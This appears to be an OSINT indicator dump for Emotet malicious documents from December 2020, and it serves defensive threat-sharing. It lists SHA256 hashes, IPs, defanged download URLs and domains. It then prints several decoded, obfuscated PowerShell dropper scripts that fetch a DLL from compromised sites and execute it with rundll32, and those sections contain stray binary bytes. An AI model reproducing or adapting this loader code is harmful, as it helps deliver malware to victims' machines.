Emotet_Doc_out_2020-12-30_15_18.txt

#Emotet #Docs #malware #OSINT #IOC

SHA256:
3c19abfa64dce865c155d22b3711029fbeb2a3b0516e186c76999a4cedbfd5f5
6a493e8b5ff18bfa985491dff440f85ab81458e502477a4163d174b2f068d2a0
9c664d5072dd450e110f36bbd5fe6cd4d600de7104677fbc31378905c832e953
a1d520c434f3b4b8113d30e94a118ba445f78b6056b5ff73d59ce6c17e62c3a4
9fa52c70fcab1c705956b5dce3f72bf83251745b40bfee40f746d15ba50f1f74
1e4c5b5a91bea84b88ae1b8bbff23fd1ac5fe3c85cccd4959ab117614f8f34c1
976cbb476135bec88e0c027ca567bece0feb9f03a777d1ff0d0be97288df5068
04fd3173148d2c11484e086e334eeaeacf5aadfc3d1742e4a42e53f74f48a915
4ce448dc3c0b2a786f0f0de325a7955364c6b13783c5dd27f2f721496bc783cc
e96e98276e75a582f1e8d7624c1ba2bf9de1ca4b28ba1f7483a2c6a1114c2aac
4b6fe5176c2fa94f736c871aeb2f0f58e5f94402ed8d1822453ab1153227f11b
dcdd4ef88b4d1d40464460f45144aa39d09537da5757842e1efe75a46c6c69fd
1efd0a1981dc07034aadfa6bdade3e26e49a389a09a617831eb51802201e5bc6
e7fe9ca43e289dc2bd9bf4266a4626a9383a283009072a247ecc6c1f84c45e0d
812a1640b65eee9ca03e9030b3fb05e9ce0f467e022839fa3959cd2e4f0e7194
1b4a340a7d7925e5635152af5c56f1fd2e77b9088afb6fe33eba7a03009f5df9
d9790597cff0277c202cb25c47d5338d113df8912fe45a44d04f2d146901ca9e
ddfe5d80323178ceb4c5120878ac5448907826e95c3b76bd9c2306e16af00092
ddfe5d80323178ceb4c5120878ac5448907826e95c3b76bd9c2306e16af00092
8034186046c4b68f988ed2c9589699ffd59443ce8573ebc96551cccc435a6723
8034186046c4b68f988ed2c9589699ffd59443ce8573ebc96551cccc435a6723
f2b0207491ef2795d3e585dded16d15d536a7649834aba2f6e24036ee9bb1b2f
c1c222eea5baec06081295edddf806c2bbd101f35d5c554d3f3b63aabe8fb576
84ff4b1cc97853c325a80d9ea06156582a5b00d8a2dbf43e776796904b5ba7cb
b418b8729a429df3b5029222db61b762411c34971aa6c76b3fed3d12146a984d
a2999babd2537572c259f968ce20f3f8796b41424ba2a63156d89e90916a2e39
20abb952582445a850b56426e396a5d2d9dc988dc5487945e69b656dec9fd94d
bf1d0474a7a16775c50fddacc2381fea17685b89ee711ad2133f326614c421ce
b5f5bab1debd9fd60535f3a992c4f90f462f3c42896c05138b18e67c36d111ed
e799e58726ad5d72644487e2fc47f0ddd22bba379bd0552bbd015e94680c70b6
4b7778c74f084c7cbe57205e56c590730227816f7212231df1ac32dc21e18c71
1ff92347fe13a6be932aff6fdc8369e3b32e4f6714f46ef5da0c08b81830e427
b28b936ecdb93bf3722b1aa7144bab5e999c31a2f0d0ebfdfb4fc76ef1af0fd0
4d1ca8add14a80752c9207b7de13b571c3984d51c34728e72bb562ff45ff8c39
5ff309e15ed409297bf10da249a2d68038b70b8032f305f43310e8930cc7d606
8559a7c90f40194b1cc0ce4e508db1896ac0bc90e0161c4469176ef0fd1f865a
ef148365077753609fe0e884ac211075d581e5b30b7a7cfa708fd9779663ba1f
9c22bfd1ad2f398e3014c41d31582d8e2c886c6fd376836b72aa02dbb6c5ef71
aa65e4dac2da0e0424ed6d43355428bd4759c98ce7799132c1d0c54162cc420e
a7db4e6fba4660583590e4869f493775027f534150a3e900666e591eec4649dc
c0081661fadf165b64870df68fca809bd6335c93f1038ddc339f88abef91d61c


IPs:
101.50.1.27
103.116.105.65
104.18.48.243
104.27.156.166
104.27.157.166
104.27.174.230
104.27.175.230
104.28.18.100
104.28.19.100
104.28.22.8
104.28.23.8
104.28.6.147
104.28.7.147
112.213.89.42
134.0.10.37
142.44.230.78
151.80.40.117
162.254.150.6
172.67.128.121
172.67.134.70
172.67.161.62
172.67.163.254
172.67.188.222
191.112.178.60
205.196.222.8
207.148.24.55
24.164.79.147
24.231.88.85
31.24.154.183
35.213.155.96
45.76.190.53
50.116.111.59
74.58.215.226
75.188.107.174
81.169.145.152
92.53.96.35


URLs:
hxxp://rossdom32.ru/t/wSF/
hxxps://appliancebuddy.in/wp-includes/m7R/
hxxps://www.taradhuay.com/c/4/
hxxp://www.rogerbaulenas.com/j/Z96X/
hxxp://thetradepad.co.uk/test/w/
hxxps://vidular.es/wp-content/K3zbi/
hxxp://sasksseed.mymonolith.com/wp-admin/xb/
hxxps://shopchailo.com/wp-content/bsQN/
hxxps://studentloananalyzer.com/wp-admin/2aPL/
hxxps://veertua.com/wp-content/HE/
hxxp://pom-poo.hk/wp-admin/EFo4q/
hxxps://goldenboyatl.com/img/Ls0/
hxxp://alkamefood.com/y/P/
hxxp://vasumadhi.com/cgi-bin/L1DCI/
hxxps://thexanhmy.com/chCounter/t/
hxxps://nicoblogroms.com/wp-includes/IZj/
hxxp://www.shortnr.xyz/wp-content/zBgK/
hxxps://valenciancountry.com/wp-includes/kppS/
hxxp://www.taylordbackups.com/wp-includes/Dfp/
hxxps://www.adnlight.com/v/Q/
hxxps://vicharemasala.com/wp-admin/1pXep/
hxxps://familylifetruth.com/cgi-bin/PPq7/
hxxps://coshou.com/wp-admin/EM/
hxxps://www.todoensaludips.com/wp-includes/9/
hxxps://dieuhoaxanh.vn/wp-admin/a/
hxxp://cahyaproperty.bbtbatam.com/mhD/
hxxp://depannage-vehicule-maroc.com/wp-admin/c/
hxxps://techworldo.com/cgi-bin/gcZ/


Domains:
rossdom32.ru
appliancebuddy.in
www.taradhuay.com
www.rogerbaulenas.com
thetradepad.co.uk
vidular.es
sasksseed.mymonolith.com
shopchailo.com
studentloananalyzer.com
veertua.com
pom-poo.hk
goldenboyatl.com
alkamefood.com
vasumadhi.com
thexanhmy.com
nicoblogroms.com
www.shortnr.xyz
valenciancountry.com
www.taylordbackups.com
www.adnlight.com
vicharemasala.com
familylifetruth.com
coshou.com
www.todoensaludips.com
dieuhoaxanh.vn
cahyaproperty.bbtbatam.com
depannage-vehicule-maroc.com
techworldo.com


Decoded Base64 Powershell:
1��>��^�>��^�<�?�^,�]z  $YLhZvk =[tYpe]"{5}{3}{2}{0}{4}{1}" -f dIRE,oRY,o.,m.I,cT,SySTe;
 SeT-iteM  VARIablE:m6r5  [tYPE]"{2}{4}{5}{1}{3}{0}" -F er,a,sySteM.,Nag,N,et.sERvICEpoinTM ;
$ErrorActionPreference = SilentlyContinue;
$As4jbvp=$G41A  [char]64  $D19Q;
$T05I=A77I;
  $ylhzVK::"crEA`Te`DiReCT`ory"$HOME  {0}Zy3ze8m{0}Nh2au05{0} -F  [CHar]92;
$J1_F=Y35J;
  ChilDITEm  vaRIAbLe:M6r5.VaLUe::"seC`Urit`YprOtoCOL" = Tls12;
$Z18R=T65Z;
$Cpx2xe9 = Q_1J;
$N43Z=K_7S;
$Pb0l3e1=$HOME{0}Zy3ze8m{0}Nh2au05{0} -F [ChaR]92$Cpx2xe9.dll;
$F40Y=W75S;
$G0ogpb7=hxxp://rossdom32.ru/t/wSF/
hxxps://appliancebuddy.in/wp-includes/m7R/
hxxps://www.taradhuay.com/c/4/
hxxp://www.rogerbaulenas.com/j/Z96X/
hxxp://thetradepad.co.uk/test/w/
hxxps://vidular.es/wp-content/K3zbi/
hxxp://sasksseed.mymonolith.com/wp-admin/xb/."re`PLa`CE"hxxp,[array]sd,sw,hxxp,3d[1]."SPl`it"$S29H  $As4jbvp  $N37M;
$K_7B=R16Q;
foreach $Yuj3mhv in $G0ogpb7{try{&New-Object sYsteM.NEt.webClieNT."dOw`N`load`File"$Yuj3mhv, $Pb0l3e1;
$Z5_W=K86N;
If &Get-Item $Pb0l3e1."lEnG`TH" -ge 49265 {&rundll32 $Pb0l3e1,Control_RunDLL."TosT`RI`NG";
$N47L=N06G;
break;
$K23J=T94U}}catch{}}$D93U=D06C<�?�^,�]z  SET-VarIABLE  "Nq""u"  [tYpE]"{3}{0}{1}{2}"-FiO.,diReCTor,Y,syStem.  ;
  $05dVSf  =  [tYPE]"{4}{6}{1}{5}{8}{7}{2}{3}{0}"-fageR,M.ne,Oin,TMaN,Sys,T.s,Te,vIcEp,Er;
$ErrorActionPreference = SilentlyContinue;
$Z22pwna=$U59N  [char]64  $Q_5K;
$M86G=L16D;
    lS  "vArI""ab""Le:N""QU"  .VAlue::"C`R`EatEDI`Rec`Tory"$HOME  ztnD4xq16tztnK8eex9iztn."RE`p`Lace"[char]122[char]116[char]110,[StRiNg][char]92;
$V30U=N6_W;
  gET-vaRiabLe 05DVsf -vaLUEOnLY ::"sE`cURI`T`yp`ROtoCol" = Tls12;
$T16U=E76M;
$Qyu87_s = V31M;
$W62K=C29V;
$Vbdkhqz=$HOME5qCD4xq16t5qCK8eex9i5qC  -rePLaCE[cHar]53[cHar]113[cHar]67,[cHar]92$Qyu87_s.dll;
$N7_K=D_6A;
$Lr0ogzu=hxxps://shopchailo.com/wp-content/bsQN/
hxxps://studentloananalyzer.com/wp-admin/2aPL/
hxxps://veertua.com/wp-content/HE/
hxxp://pom-poo.hk/wp-admin/EFo4q/
hxxps://goldenboyatl.com/img/Ls0/
hxxp://alkamefood.com/y/P/
hxxp://vasumadhi.com/cgi-bin/L1DCI/."Repla`CE"hxxp,[array]sd,sw,hxxp,3d[1]."S`pLiT"$L28P  $Z22pwna  $V61Q;
$P34K=Z57E;
foreach $J8wqniy in $Lr0ogzu{try{&New-Object sYstEM.nEt.WEbCliENt."DO`WnlOAd`Fi`Le"$J8wqniy, $Vbdkhqz;
$O38Q=O71W;
If .Get-Item $Vbdkhqz."L`ENGth" -ge 37438 {&rundll32 $Vbdkhqz,Control_RunDLL."t`oS`TrINg";
$S11Y=W61W;
break;
$E34O=H72Q}}catch{}}$K58X=M16U<�?�^,�]z $J1w =[Type]"{6}{3}{0}{5}{4}{2}{1}" -ft,cTOry,RE,yS,o.di,EM.i,s ;
  $0Gye  = [TyPE]"{8}{7}{3}{5}{0}{4}{6}{1}{2}" -fserVice,mANa,gER,.NEt,po,.,iNT,STem,Sy  ;
 $ErrorActionPreference = SilentlyContinue;
$Qsmflw2=$R55D  [char]64  $I65B;
$X58Q=E51T;
   vARIabLE j1w  -Valu  ::"cR`eated`IrEcTO`RY"$HOME  0ewD73hpgv0ewMogjtd60ew -REPlaCe [chAR]48[chAR]101[chAR]119,[chAR]92;
$C50S=P22L;
   gEt-VarIABLE 0GYE -VaLuEOnl::"S`EcURitypROt`ocOl" = Tls12;
$D68Y=X37K;
$Xe0vtxc = K52M;
$F70I=X64T;
$Tec7a7x=$HOMELJQD73hpgvLJQMogjtd6LJQ."re`pLACE"LJQ,\$Xe0vtxc.dll;
$G78P=F4_H;
$Hl1ljw9=hxxps://thexanhmy.com/chCounter/t/
hxxps://nicoblogroms.com/wp-includes/IZj/
hxxp://www.shortnr.xyz/wp-content/zBgK/
hxxps://valenciancountry.com/wp-includes/kppS/
hxxp://www.taylordbackups.com/wp-includes/Dfp/
hxxps://www.adnlight.com/v/Q/
hxxps://vicharemasala.com/wp-admin/1pXep/."RePL`AcE"hxxp,[array]sd,sw,hxxp,3d[1]."S`plIT"$J89E  $Qsmflw2  $Z97Y;
$T44L=Z49K;
foreach $Afvt7c3 in $Hl1ljw9{try{.New-Object SySTEM.neT.wEbClIENt."d`oWnLoADf`iLE"$Afvt7c3, $Tec7a7x;
$Q3_R=H61J;
If &Get-Item $Tec7a7x."L`ENgtH" -ge 41643 {.rundll32 $Tec7a7x,Control_RunDLL."toST`R`Ing";
$L08X=W82B;
break;
$W51O=G33B}}catch{}}$N65E=V2_W<�?�^,�]zSET-VarIABle  8ih567    [tYpe]"{3}{0}{4}{2}{1}"-fYsT,RecTORy,M.iO.DI,s,e;
   SET-Item "vA""RiA""bLe:R""i""7xO3" [TyPe]"{2}{5}{4}{3}{1}{0}"-F R,MaNaGE,S,VIcEPoInt,.neT.sEr,Ystem   ;
  $ErrorActionPreference = SilentlyContinue;
$H0wcfnc=$P58B  [char]64  $Z19R;
$B53N=S77H;
    ls  VarIaBLE:8ih567  .Value::"CREAt`E`D`iRecTOrY"$HOME  eN7Rr1sj9aeN7Bcx4iayeN7."reP`La`cE"[CHaR]101[CHaR]78[CHaR]55,[sTrinG][CHaR]92;
$V57R=B46V;
 vaRIaBle "R""i""7xO3" .VAlUE::"SeCurI`T`yP`RO`ToCOL" = Tls12;
$X44S=S81D;
$Pa2nur4 = K_9O;
$O66G=F88W;
$Cyg0ku7=$HOMEeAwRr1sj9aeAwBcx4iayeAw -repLACeeAw,[chaR]92$Pa2nur4.dll;
$E01B=R7_S;
$Mrkjcim=hxxps://familylifetruth.com/cgi-bin/PPq7/
hxxps://coshou.com/wp-admin/EM/
hxxps://www.todoensaludips.com/wp-includes/9/
hxxps://dieuhoaxanh.vn/wp-admin/a/
hxxp://cahyaproperty.bbtbatam.com/mhD/
hxxp://depannage-vehicule-maroc.com/wp-admin/c/
hxxps://techworldo.com/cgi-bin/gcZ/."rEPlA`cE"hxxp,[array]sd,sw,hxxp,3d[1]."sPl`It"$T26A  $H0wcfnc  $B75P;
$W71T=P93X;
foreach $Fs6mo5w in $Mrkjcim{try{.New-Object sYsteM.net.WEbCLiEnt."DOwNLoAdf`I`Le"$Fs6mo5w, $Cyg0ku7;
$G75Q=W8_R;
If &Get-Item $Cyg0ku7."l`ength" -ge 30575 {.rundll32 $Cyg0ku7,Control_RunDLL."T`osTr`ING";
$B29D=Z62W;
break;
$F26F=V37W}}catch{}}$J1_N=T08H���������?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^���z˦�?�^�